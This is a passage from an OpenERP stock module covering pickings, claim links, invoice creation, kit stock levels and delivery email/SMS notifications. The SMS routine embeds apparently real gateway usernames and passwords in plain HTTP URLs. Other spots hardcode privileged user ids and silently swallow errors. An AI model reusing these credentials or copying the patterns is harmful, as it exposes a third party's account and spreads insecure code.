fields.function(_product_value_ats, type='float', string='ATS Stock',),\n 'stock_real': fields.function(_product_value, type='float', string='Real Stock', multi=\"stock\"),\n 'stock_virtual': fields.function(_product_value, type='float', string='Virtual Stock', multi=\"stock\"),\n 'stock_real_value': fields.function(_product_value, type='float', string='Real Stock Value', 
multi=\"stock\", digits_compute=dp.get_precision('Account')),\n 'stock_virtual_value': fields.function(_product_value, type='float', string='Virtual Stock Value', multi=\"stock\", digits_compute=dp.get_precision('Account')),\n }\n\nclass stock_picking(orm.Model):\n _inherit = 'stock.picking'\n\n def _crm_claim(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for picking in self.browse(cr, uid, ids, context=context):\n res[picking.id] = {\n 'if_claim':False,\n 'claim_id':False,\n }\n if picking.sale_id:\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n res[picking.id] = {\n 'if_claim':True,\n 'claim_id':claim_id[0],\n }\n return res\n\n _columns = {\n #'if_notification': fields.boolean('Email DO Notification', help=\"Send DO Notification Auto\"),\n #'auto_email': fields.many2one('auto.email.int', \"Auto Email Template\"),\n 'auto_email': fields.many2one('auto.email.do', \"Auto Email Template\"),\n 'shipping_method':fields.related('sale_id','shipping_method',type='selection',selection=[\n ('collection','Collection'), \n ('post','Post'), \n ('courier','Courier'), \n ('free','Free Shipping'), \n ('transport','Own Transport'),\n ('freight','Freight')\n ],readonly='1',string='Shipping Method'),\n 'is_preorder':fields.related('sale_id','is_preorder',type='boolean',readonly='1',string='If prepay order'),\n 'control' : fields.char('3PL Inward Control #', size=32, select=True),\n 'date_order': fields.related('purchase_id','date_order',string='ETD',readonly=True,type=\"date\"),\n 'minimum_planned_date': fields.related('purchase_id','minimum_planned_date',string='Expected Date',readonly=True,type=\"date\"),\n 'partner_ref': fields.related('purchase_id','partner_ref',string='Supplier Reference',readonly=True,type=\"char\"),\n #Issue350\n 'is_seconds': fields.boolean('Is Seconds'),\n 'seconds': fields.selection((\n ('missing','Missing Parts'), \n ('fully','Fully Damaged')),'Seconds'),\n 'seconds_lines': fields.one2many('seconds.line', 'picking_id', string='Seconds Lines'),\n 'if_claim': fields.function(_crm_claim, type='boolean', string='If Claim', multi='claim'),\n 'claim_id': fields.function(_crm_claim, type='many2one', relation='crm.claim', string='Claim ID', multi='claim'), #Issue349\n }\n\n _defaults = {\n #'if_notification': True,\n }\n\n #Issue267\n def create(self, cr, uid, vals, context=None):\n auto_email = self.pool.get('auto.email.do').search(cr, uid, \n [('company_id', '=', self.pool.get('res.users').browse(cr, uid, uid).company_id.id)],\n limit=1)\n if auto_email:\n vals.update({'auto_email': auto_email[0]})\n return super(stock_picking, self).create(cr, uid, vals, context=context)\n\n def write(self, cr, uid, ids, vals, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n if ((context and not context.get('from stock')) or not context):\n for picking in self.browse(cr, uid, ids):\n if 'note' in vals:\n self.pool.get('sale.order').write(cr, uid, picking.sale_id.id, {'note':vals['note']}, context={'from stock':True})\n for p in picking.sale_id.picking_ids:\n self.write(cr, uid, p.id, {'note':vals['note']}, context={'from stock':True})\n #Issue266\n if 'carrier_id' in vals:\n if picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'out' and (not picking_id.carrier_id or picking_id.carrier_id == picking.carrier_id):\n self.write(cr, uid, picking_id.id, {'carrier_id':vals['carrier_id']}, context={'from stock':True})\n if 'carrier_tracking_ref' in 
vals:\n if picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'out' and (not picking_id.carrier_tracking_ref or picking_id.carrier_tracking_ref == picking.carrier_tracking_ref):\n self.write(cr, uid, picking_id.id, {'carrier_tracking_ref':vals['carrier_tracking_ref']}, context={'from stock':True})\n return super(stock_picking, self).write(cr, uid, ids, vals, context=context)\n\n\n def action_view_so(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'sale', 'action_orders')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking.sale_id.id\n return result\n\n def action_view_do(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'out':\n res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking_id.id\n return result\n return True\n\n\n def action_done(self, cr, uid, ids, context=None):\n for picking in self.browse(cr, uid, ids, context=context):\n #issue119\n if picking.type == 'in' and picking.company_id.id in (4,5,7) and picking.purchase_id and picking.purchase_id.related_so:\n so = self.pool.get('sale.order').browse(cr, 86, int(picking.purchase_id.related_so))\n #if not so.invoiced:\n # raise osv.except_osv('Invalid Action!', 'The %s has not been paid! Please check it!'%so.name)\n for p in so.picking_ids:\n if p.type == 'internal' and p.state != 'done':\n raise osv.except_osv('Invalid Action!', 'The INT %s has not been delivered! 
Please check it!'%p.name)\n if p.type == 'out':\n wf_service = netsvc.LocalService('workflow')\n #self.action_confirm_zx(cr, 86, p.id, context=context)\n res = wf_service.trg_validate(86, 'stock.picking', p.id, 'button_confirm', cr)\n res = wf_service.trg_validate(86, 'stock.picking', p.id, 'button_done', cr)\n if picking.type == 'internal' and picking.company_id.id == 8 and picking.sale_id and picking.sale_id.related_po:\n po = self.pool.get('purchase.order').browse(cr, 1, int(picking.sale_id.related_po))\n if po.company_id.id == 5:\n self.pool.get('res.users').write(cr, 1, 48, {'company_id':5}, context=context)\n \n #send purchase@mactrends.com\n ir_model_data = self.pool.get('ir.model.data')\n try:\n template_id = ir_model_data.get_object_reference(cr, 48, 'purchase_enhance','email_template_purchase_confirm')[1]\n except ValueError:\n template_id = False\n if template_id:\n template_obj = self.pool.get('email.template')\n template_obj.write(cr, 1, [template_id], {'email_to':'purchase@mactrends.com'})\n mail_id = template_obj.send_mail(cr, 48, template_id, po.id, True)\n\n result = super(stock_picking, self).action_done(cr, uid, ids, context=context)\n for picking in self.browse(cr, uid, ids, context=context):\n #issue150\n if picking.type == 'out' and picking.sale_id:\n wf_service = netsvc.LocalService('workflow')\n wf_service.trg_validate(uid, 'sale.order', picking.sale_id.id, 'button_done', cr)\n #Issue261\n if picking and picking.partner_id and picking.partner_id.email and picking.state in ('progress','manual'):\n tmp_ids = []\n for line in picking.move_lines:\n if line.product_id.auto_email and line.product_id.auto_email.is_send_do:\n for template_id in line.product_id.auto_email.templates_do:\n tmp_ids.append(template_id.id)\n elif line.product_id.categ_id.auto_email and line.product_id.categ_id.auto_email.is_send_do:\n for template_id in line.product_id.categ_id.auto_email.templates_do:\n tmp_ids.append(template_id.id)\n for tmp_id in list(set(tmp_ids)): \n template_obj.send_mail(cr, uid, tmp_id, picking.id, True)\n return result\n\n def action_confirm_zx(self, cr, uid, ids, context=None):\n \"\"\" Confirm the inventory and writes its finished date\n @return: True\n \"\"\"\n if context is None:\n context = {}\n # to perform the correct inventory corrections we need analyze stock location by\n # location, never recursively, so we use a special context\n product_context = dict(context, compute_child=False)\n\n location_obj = self.pool.get('stock.location')\n for inv in self.browse(cr, uid, ids, context=context):\n move_ids = []\n for line in inv.inventory_line_id:\n pid = line.product_id.id\n product_context.update(uom=line.product_uom.id, to_date=inv.date, date=inv.date, prodlot_id=line.prod_lot_id.id)\n amount = location_obj._product_get(cr, uid, line.location_id.id, [pid], product_context)[pid]\n change = line.product_qty - amount\n lot_id = line.prod_lot_id.id\n if change:\n location_id = line.product_id.property_stock_inventory.id\n value = {\n 'name': _('INV:') + (line.inventory_id.name or ''),\n 'product_id': line.product_id.id,\n 'product_uom': line.product_uom.id,\n 'prodlot_id': lot_id,\n 'date': inv.date,\n }\n\n if change > 0:\n value.update( {\n 'product_qty': change,\n 'location_id': location_id,\n 'location_dest_id': line.location_id.id,\n })\n else:\n value.update( {\n 'product_qty': -change,\n 'location_id': line.location_id.id,\n 'location_dest_id': location_id,\n })\n move_ids.append(self._inventory_line_hook(cr, uid, line, value))\n self.write(cr, uid, [inv.id], 
{'state': 'confirm', 'move_ids': [(6, 0, move_ids)]})\n self.pool.get('stock.move').action_confirm(cr, uid, move_ids, context=context)\n return True\n\n def action_check(self, cr, uid, ids, *args):\n \"\"\" Check qty of product.\n if f == 'qty_available':\n c.update({ 'states': ('done',), 'what': ('in', 'out') })\n if f == 'virtual_available':\n c.update({ 'states': ('confirmed','waiting','assigned','done'), 'what': ('in', 'out') })\n if f == 'incoming_qty':\n c.update({ 'states': ('confirmed','waiting','assigned'), 'what': ('in',) })\n if f == 'outgoing_qty':\n c.update({ 'states': ('confirmed','waiting','assigned'), 'what': ('out',) })\n @return: True\n \"\"\"\n for picking in self.browse(cr, uid, ids):\n for move in picking.move_lines:\n qty = self.pool.get('stock.location')._product_get_multi_location(cr, uid, [move.location_id.id], product_ids=[move.product_id.id], context={\n 'states': ['done'],\n 'what': ('in', 'out'),\n 'location': [move.location_id.id]\n })\n if qty.get(move.product_id.id, 0) - move.product_qty < 0:\n raise osv.except_osv('Invalid Action!', 'The qty of %s is not enough(%s<%s)! Please check it!'%(move.product_id.name_template, qty.get(move.product_id.id, 0), move.product_qty))\n return self.action_assign(cr, uid, ids, *args)\n\n #Issue363\n def _prepare_invoice(self, cr, uid, picking, partner, inv_type, journal_id, context=None):\n invoice_vals = super(stock_picking, self)._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)\n if 'return' in picking.name:\n invoice_vals.update({\n 'product_return': True,\n 'refund_picking_id': picking.id,\n #'if_returned': picking.state == 'done' and True or False\n })\n if picking.claim_id:\n invoice_vals.update({\n 'claim_id': picking.claim_id.id\n })\n return invoice_vals\n\n #Issue349\n def action_invoice_create(self, cr, uid, ids, journal_id=False,\n group=False, type='out_invoice', context=None):\n \"\"\" Creates invoice based on the invoice state selected for picking.\n @param journal_id: Id of journal\n @param group: Whether to create a group invoice or not\n @param type: Type invoice to be created\n @return: Ids of created invoices for the pickings\n \"\"\"\n if context is None:\n context = {}\n\n invoice_obj = self.pool.get('account.invoice')\n invoice_line_obj = self.pool.get('account.invoice.line')\n partner_obj = self.pool.get('res.partner')\n invoices_group = {}\n res = {}\n inv_type = type\n for picking in self.browse(cr, uid, ids, context=context):\n if picking.invoice_state != '2binvoiced':\n continue\n partner = self._get_partner_to_invoice(cr, uid, picking, context=context)\n if isinstance(partner, int):\n partner = partner_obj.browse(cr, uid, [partner], context=context)[0]\n if not partner:\n raise osv.except_osv(_('Error, no partner!'),\n _('Please put a partner on the picking list if you want to generate invoice.'))\n\n if not inv_type:\n inv_type = self._get_invoice_type(picking)\n\n if group and partner.id in invoices_group:\n invoice_id = invoices_group[partner.id]\n invoice = invoice_obj.browse(cr, uid, invoice_id)\n invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)\n invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)\n else:\n invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)\n invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)\n invoices_group[partner.id] = invoice_id\n res[picking.id] = invoice_id\n #Issue349\n if not 
picking.sale_id:\n for move_line in picking.move_lines:\n if move_line.state == 'cancel':\n continue\n if move_line.scrapped:\n # do no invoice scrapped products\n continue\n vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n self._invoice_line_hook(cr, uid, move_line, invoice_line_id)\n else:\n for move_line in picking.sale_id.order_line:\n if move_line.state == 'cancel':\n continue\n vals = self._prepare_invoice_line_sale(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n move_line.write({'invoice_lines': [(4, invoice_line_id)]})\n\n\n invoice_obj.button_compute(cr, uid, [invoice_id], context=context,\n set_total=(inv_type in ('in_invoice', 'in_refund')))\n self.write(cr, uid, [picking.id], {\n 'invoice_state': 'invoiced',\n }, context=context)\n self._invoice_hook(cr, uid, picking, invoice_id)\n self.write(cr, uid, res.keys(), {\n 'invoice_state': 'invoiced',\n }, context=context)\n return res\n\n def _prepare_invoice_line_sale(self, cr, uid, group, picking, move_line, invoice_id,\n invoice_vals, context=None):\n \"\"\" Builds the dict containing the values for the invoice line\n @param group: True or False\n @param picking: picking object\n @param: move_line: move_line object\n @param: invoice_id: ID of the related invoice\n @param: invoice_vals: dict used to created the invoice\n @return: dict that will be used to create the invoice line\n \"\"\"\n if group:\n name = (picking.name or '') + '-' + move_line.name\n else:\n name = move_line.name\n origin = move_line.order_id.name or ''\n if move_line.order_id.origin:\n origin += ':' + move_line.order_id.origin\n\n if invoice_vals['type'] in ('out_invoice', 'out_refund'):\n account_id = move_line.product_id.property_account_income.id\n if not account_id:\n account_id = move_line.product_id.categ_id.\\\n property_account_income_categ.id\n else:\n account_id = move_line.product_id.property_account_expense.id\n if not account_id:\n account_id = move_line.product_id.categ_id.\\\n property_account_expense_categ.id\n if invoice_vals['fiscal_position']:\n fp_obj = self.pool.get('account.fiscal.position')\n fiscal_position = fp_obj.browse(cr, uid, invoice_vals['fiscal_position'], context=context)\n account_id = fp_obj.map_account(cr, uid, fiscal_position, account_id)\n # set UoS if it's a sale and the picking doesn't have one\n uos_id = move_line.product_uos and move_line.product_uos.id or False\n if not uos_id and invoice_vals['type'] in ('out_invoice', 'out_refund'):\n uos_id = move_line.product_uom.id\n\n return {\n 'name': name,\n 'origin': origin,\n 'invoice_id': invoice_id,\n 'uos_id': uos_id,\n 'product_id': move_line.product_id.id,\n 'account_id': account_id,\n 'price_unit': self._get_price_unit_invoice_sale(cr, uid, move_line, invoice_vals['type']),\n 'discount': move_line.discount,\n 'quantity': move_line.product_uos_qty or move_line.product_qty,\n 'invoice_line_tax_id': [(6, 0, [x.id for x in move_line.tax_id])],\n 'account_analytic_id': self._get_account_analytic_invoice(cr, uid, picking, move_line),\n }\n\n def _get_price_unit_invoice_sale(self, cursor, user, move_line, type):\n uom_id = move_line.product_id.uom_id.id\n uos_id = move_line.product_id.uos_id and move_line.product_id.uos_id.id or False\n price = move_line.price_unit\n coeff = 
move_line.product_id.uos_coeff\n if uom_id != uos_id and coeff != 0:\n price_unit = price / coeff\n return price_unit\n return move_line.price_unit\n\n\nclass stock_picking_out(orm.Model):\n _inherit = 'stock.picking.out'\n\n def _crm_claim(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for picking in self.browse(cr, uid, ids, context=context):\n res[picking.id] = {\n 'if_claim':False,\n 'claim_id':False,\n }\n if picking.sale_id:\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n res[picking.id] = {\n 'if_claim':True,\n 'claim_id':claim_id[0],\n }\n return res\n\n _columns = {\n #'if_notification': fields.boolean('Email DO Notification', help=\"Send DO Notification Auto\"),\n 'auto_email': fields.many2one('auto.email.do', \"Auto Email Template\"),\n 'shipping_method':fields.related('sale_id','shipping_method',type='selection',selection=[\n ('collection','Collection'), \n ('post','Post'), \n ('courier','Courier'), \n ('free','Free Shipping'), \n ('transport','Own Transport'),\n ('freight','Freight')\n ],readonly='1',string='Shipping Method'),\n 'if_claim': fields.function(_crm_claim, type='boolean', string='If Claim', multi='claim'),\n 'claim_id': fields.function(_crm_claim, type='many2one', relation='crm.claim', string='Claim ID', multi='claim'), #Issue349\n }\n\n _defaults = {\n #'if_notification': True,\n }\n\n #Issue267\n def create(self, cr, uid, vals, context=None):\n auto_email = self.pool.get('auto.email.do').search(cr, uid, \n [('company_id', '=', self.pool.get('res.users').browse(cr, uid, uid).company_id.id)],\n limit=1)\n if auto_email:\n vals.update({'auto_email': auto_email[0]})\n return super(stock_picking_out, self).create(cr, uid, vals, context=context)\n\n def write(self, cr, uid, ids, vals, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n res = super(stock_picking_out, self).write(cr, uid, ids, vals, context=context)\n if 'note' in vals and ((context and not context.get('from stock')) or not context):\n for picking in self.browse(cr, uid, ids, context=context):\n self.pool.get('sale.order').write(cr, uid, picking.sale_id.id, {'note':vals['note']}, context={'from stock':True})\n for p in picking.sale_id.picking_ids:\n self.pool.get('stock.picking').write(cr, uid, p.id, {'note':vals['note']}, context={'from stock':True})\n return res\n\n def action_view_so(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'sale', 'action_orders')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking.sale_id.id\n return result\n\n def action_view_int(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #sale order\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n for picking_id in picking.sale_id.picking_ids:\n if picking_id.type == 'internal':\n res = 
mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_form')\n result['views'] = [(res and res[1] or False, 'form')]\n result['res_id'] = picking_id.id\n return result\n return True\n\n #issue 121\n def action_view_claim(self, cr, uid, ids, context=None):\n mod_obj = self.pool.get('ir.model.data')\n act_obj = self.pool.get('ir.actions.act_window')\n\n result = mod_obj.get_object_reference(cr, uid, 'crm_claim', 'crm_case_categ_claim0')\n id = result and result[1] or False\n result = act_obj.read(cr, uid, [id], context=context)[0]\n #crm claim\n picking = self.browse(cr, uid, ids[0], context=context)\n if picking and picking.sale_id:\n res = mod_obj.get_object_reference(cr, uid, 'crm_claim', 'crm_case_claims_form_view')\n result['views'] = [(res and res[1] or False, 'form')]\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n result['res_id'] = claim_id[0]\n return result\n\n #issue137\n def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False):\n if not context:\n context = {}\n if uid != 1:\n company_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.id\n domain.append(['company_id','=',company_id])\n return super(stock_picking_out, self).read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby)\n\n\nclass stock_picking_in(orm.Model):\n _inherit = 'stock.picking.in'\n\n def _crm_claim(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for picking in self.browse(cr, uid, ids, context=context):\n res[picking.id] = {\n 'if_claim':False,\n 'claim_id':False,\n }\n if picking.sale_id:\n claim_id = self.pool.get('crm.claim').search(cr, uid, [('sale_id','=',picking.sale_id.id)])\n if claim_id and claim_id[0]:\n res[picking.id] = {\n 'if_claim':True,\n 'claim_id':claim_id[0],\n }\n return res\n\n #Issue242\n _columns = {\n 'date_order': fields.related('purchase_id','date_order',string='ETD',readonly=True,type=\"date\"),\n 'minimum_planned_date': fields.related('purchase_id','minimum_planned_date',string='Expected Date',readonly=True,type=\"date\"),\n 'partner_ref': fields.related('purchase_id','partner_ref',string='Supplier Reference',readonly=True,type=\"char\"),\n #Issue350\n 'is_seconds': fields.boolean('Is Seconds'),\n 'seconds': fields.selection((\n ('missing','Missing Parts'), \n ('fully','Fully Damaged')),'Seconds'),\n 'seconds_lines': fields.one2many('seconds.line', 'picking_id', string='Seconds Lines'),\n #'claim_id': fields.many2one('crm.claim', string='Claim ID'), #Issue349\n 'if_claim': fields.function(_crm_claim, type='boolean', string='If Claim', multi='claim'),\n 'claim_id': fields.function(_crm_claim, type='many2one', relation='crm.claim', string='Claim ID', multi='claim'), #Issue349\n }\n\n# def default_get(self, cr, uid, fields, context=None):\n# if context is None:\n# context = {}\n# res = super(stock_picking_in, self).default_get(cr, uid, fields, context=context)\n#\n# if 'claim_id' in fields and 'claim_id' in context:\n# res.update({'claim_id': context['claim_id']})\n#\n# return res\n #Issue349\n def action_invoice_create(self, cr, uid, ids, journal_id=False,\n group=False, type='out_invoice', context=None):\n \"\"\" Creates invoice based on the invoice state selected for picking.\n @param journal_id: Id of journal\n @param group: Whether to create a group invoice or not\n @param type: Type invoice to be created\n @return: Ids of created invoices for the pickings\n \"\"\"\n 
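The method body below repeats the grouping idiom used in stock_picking.action_invoice_create earlier in this module: when group is true, the first picking seen for a partner creates an invoice, and each later picking for the same partner is merged into it through the invoices_group dict keyed on partner id. A framework-free sketch of just that accumulation, with illustrative names rather than real OpenERP API:

def group_invoices_by_partner(pickings, group=True):
    invoices_group = {}  # partner id -> the invoice that partner's pickings share
    res = {}             # picking id -> invoice, mirroring the res dict returned below
    for picking in pickings:
        partner_id = picking['partner_id']
        if group and partner_id in invoices_group:
            invoice_id = invoices_group[partner_id]   # reuse the partner's invoice
        else:
            invoice_id = 'INV-%s' % picking['id']     # stand-in for invoice_obj.create()
            invoices_group[partner_id] = invoice_id
        res[picking['id']] = invoice_id
    return res

demo = [{'id': 1, 'partner_id': 7}, {'id': 2, 'partner_id': 7}, {'id': 3, 'partner_id': 9}]
print(group_invoices_by_partner(demo))  # {1: 'INV-1', 2: 'INV-1', 3: 'INV-3'}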
if context is None:\n context = {}\n\n invoice_obj = self.pool.get('account.invoice')\n invoice_line_obj = self.pool.get('account.invoice.line')\n partner_obj = self.pool.get('res.partner')\n invoices_group = {}\n res = {}\n inv_type = type\n for picking in self.browse(cr, uid, ids, context=context):\n if picking.invoice_state != '2binvoiced':\n continue\n partner = self._get_partner_to_invoice(cr, uid, picking, context=context)\n if isinstance(partner, int):\n partner = partner_obj.browse(cr, uid, [partner], context=context)[0]\n if not partner:\n raise osv.except_osv(_('Error, no partner!'),\n _('Please put a partner on the picking list if you want to generate invoice.'))\n\n if not inv_type:\n inv_type = self._get_invoice_type(picking)\n\n if group and partner.id in invoices_group:\n invoice_id = invoices_group[partner.id]\n invoice = invoice_obj.browse(cr, uid, invoice_id)\n invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)\n invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)\n else:\n invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)\n invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)\n invoices_group[partner.id] = invoice_id\n res[picking.id] = invoice_id\n #Issue349\n if not picking.sale_id:\n for move_line in picking.move_lines:\n if move_line.state == 'cancel':\n continue\n if move_line.scrapped:\n # do not invoice scrapped products\n continue\n vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n self._invoice_line_hook(cr, uid, move_line, invoice_line_id)\n else:\n for move_line in picking.sale_id.order_line:\n if move_line.state == 'cancel':\n continue\n vals = self._prepare_invoice_line_sale(cr, uid, group, picking, move_line,\n invoice_id, invoice_vals, context=context)\n if vals:\n invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)\n move_line.write({'invoice_lines': [(4, invoice_line_id)]})\n\n\n invoice_obj.button_compute(cr, uid, [invoice_id], context=context,\n set_total=(inv_type in ('in_invoice', 'in_refund')))\n self.write(cr, uid, [picking.id], {\n 'invoice_state': 'invoiced',\n }, context=context)\n self._invoice_hook(cr, uid, picking, invoice_id)\n self.write(cr, uid, res.keys(), {\n 'invoice_state': 'invoiced',\n }, context=context)\n return res\n\n\nclass stock_partial_picking(osv.osv_memory):\n _inherit = \"stock.partial.picking\"\n\n def do_partial(self, cr, uid, ids, context=None):\n # use None instead of a shared mutable default for context\n if context is None:\n context = {}\n ret_val = super(stock_partial_picking, self).do_partial(cr, uid, ids, context=context)\n ''' \n if context.get('send_au_ftp_file', False):\n picking_obj.send_freight_file(cr, uid, context['active_ids'], context)\n template = self.pool.get('ir.model.data').get_object(cr, uid, 'picking_notify', 'picking_notify_email_template')\n ''' \n picking_obj = self.pool.get('stock.picking.out')\n email_obj = self.pool.get('email.template')\n for picking in picking_obj.browse(cr, uid, context['active_ids']):\n if picking.type=='out' and picking.auto_email and picking.auto_email.if_notify and picking.partner_id and picking.partner_id.email:\n for move in picking.move_lines:\n if move.location_dest_id.id == 9: #customer\n '''\n if picking.company_id.id == 5:\n template_id = 55\n elif picking.company_id.id == 4:\n template_id = 27\n elif picking.company_id.id == 7:\n template_id = 
28\n else:\n return ret_val\n '''\n template_id = picking.auto_email.template_notify\n mail_id = email_obj.send_mail(cr, uid, template_id, picking.id, force_send=True)\n #zhangxue send sms\n email = self.pool.get('mail.mail').browse(cr, uid, mail_id)\n if not email:\n return ret_val\n if hasattr(email, 'mail_server_id') and (not email.mail_server_id):\n return ret_val\n try:\n template = template_obj.browse(cr, uid, template_id, context=context)\n if template and template.if_sms and template.sms and template.sms.strip():\n sms_body = template_obj.render_template(cr, uid, template.sms, template.model, ids[0], context)\n partner_id = self.browse(cr, uid, ids[0]).partner_id\n sms_to = partner_id.phone or partner_id.mobile or ''\n sms_to = sms_to.replace(' ','')\n if sms_to and sms_body:\n if picking.company_id.id == 4:\n sms_to = '61' + sms_to[1:]\n elif picking.company_id.id == 5:\n sms_to = '64' + sms_to[1:]\n #url = 'https://www.siptraffic.com/myaccount/sendsms.php?username=mactrends&password=jmfimports2010&from=+001800&to=%s&text=%s'%(sms_to,sms_body)\n url = 'http://api.clickatell.com/http/sendmsg?user=mactrends_sms&password=PNKMUaffcWAIeN&api_id=3536862&to=%s&text=%s'%(sms_to,sms_body)\n res = requests.get(url)\n except:\n pass\n\n break\n return ret_val\n\nclass product_product(osv.osv):\n _inherit = \"product.product\"\n\n def _volume_total(self, cr, uid, ids, field_names, arg, context=None):\n res = {}\n for pd in self.browse(cr, uid, ids, context=context):\n res[pd.id] = pd.qty_available * pd.volume\n return res\n\n def _kits_product_available(self, cr, uid, ids, field_names=None, arg=False, context=None):\n res = {}\n field_names = field_names or []\n context = context or {}\n for id in ids:\n res[id] = {}.fromkeys(field_names, 0.0)\n field_map = {\n 'kits_qty_available': 'qty_available',\n 'kits_incoming_qty': 'incoming_qty',\n 'kits_outgoing_qty': 'outgoing_qty',\n 'kits_virtual_available': 'virtual_available'\n }\n for product_record in self.browse(cr, uid, ids, context=context):\n #check if is a kit product.\n so_qty = self._get_sale_quotation_qty(cr, uid, product_record.id, context=context)\n if not self._is_kit(\n cr, uid,\n [product_record.id],\n context=context).get(product_record.id):\n\n res[product_record.id] = {\n 'kits_qty_available': 0,\n 'kits_incoming_qty': 0,\n 'kits_virtual_available': 0,\n 'kits_outgoing_qty': 0,\n 'kits_sale_quotation_qty': so_qty\n }\n #product with no bom\n # if not product_record.bom_ids:\n # raw_res = self._product_available(cr, uid, [product_record.id], field_map.values(), arg, context)\n # for key, val in field_map.items():\n # res[product_record.id][key] = raw_res[product_record.id].get(val)\n\n #TODO how to deal with multi-bom products.\n #now get always get the first bom.\n #product with bom\n else:\n for bom in product_record.bom_ids:\n #bom type is phantom\n #TODO take care of the valid date of the components\n if bom.type == 'phantom':\n child_product_res = {}\n for line in bom.bom_lines:\n child_product_res[line.product_id.id] = {'product_qty': line.product_qty or 0.0}\n child_product_qtys = self._product_available(cr, uid, child_product_res.keys(), field_map.values(), context=context)\n res[product_record.id] = {\n 'kits_qty_available': self._get_qty_from_children(child_product_qtys, child_product_res, 'qty_available'),\n 'kits_incoming_qty': self._get_qty_from_children(child_product_qtys, child_product_res, 'incoming_qty'),\n 'kits_virtual_available': self._get_qty_from_children(child_product_qtys, child_product_res, 
'virtual_available') - so_qty,\n 'kits_outgoing_qty': self._get_qty_from_children(child_product_qtys, child_product_res, 'outgoing_qty'),\n 'kits_sale_quotation_qty': so_qty\n }\n\n else:\n raw_res = self._product_available(cr, uid, ids, field_map.values(), arg, context)\n for key, val in field_map.items():\n res[product_record.id][key] = raw_res[product_record.id].get(val)\n\n #only get the first bom.\n break\n return res\n\n def _get_sale_quotation_qty(self, cr, uid, product_id, context=None):\n '''get all qty of the product in all sale quotations (draft, sent)'''\n sol_obj = self.pool.get('sale.order.line')\n domain = [('state', 'in', ('draft', False, None)), ('product_id', '=', product_id)]\n #TODO take care of the uom.\n sol_ids = sol_obj.read_group(cr, uid, domain, ['product_uom_qty', 'product_id'], groupby=['product_id'])\n return sol_ids and sol_ids[0].get('product_uom_qty') or 0.0\n\n def _get_qty_from_children(self, child_product_qtys, child_product_res, field_name):\n def qty_div(product_total_qty, component_qty):\n return product_total_qty[1].get(field_name) / component_qty[1].get('product_qty')\n # when the bom has no components\n # Alex Duan <alex.duan@elico-corp.com>\n if not child_product_res:\n raise osv.except_osv(\n _('Warning'),\n _('BoM of this product has no components.\\n'\n 'To avoid this warning, you might add components for this BoM.\\n'))\n return min(map(qty_div, child_product_qtys.iteritems(), 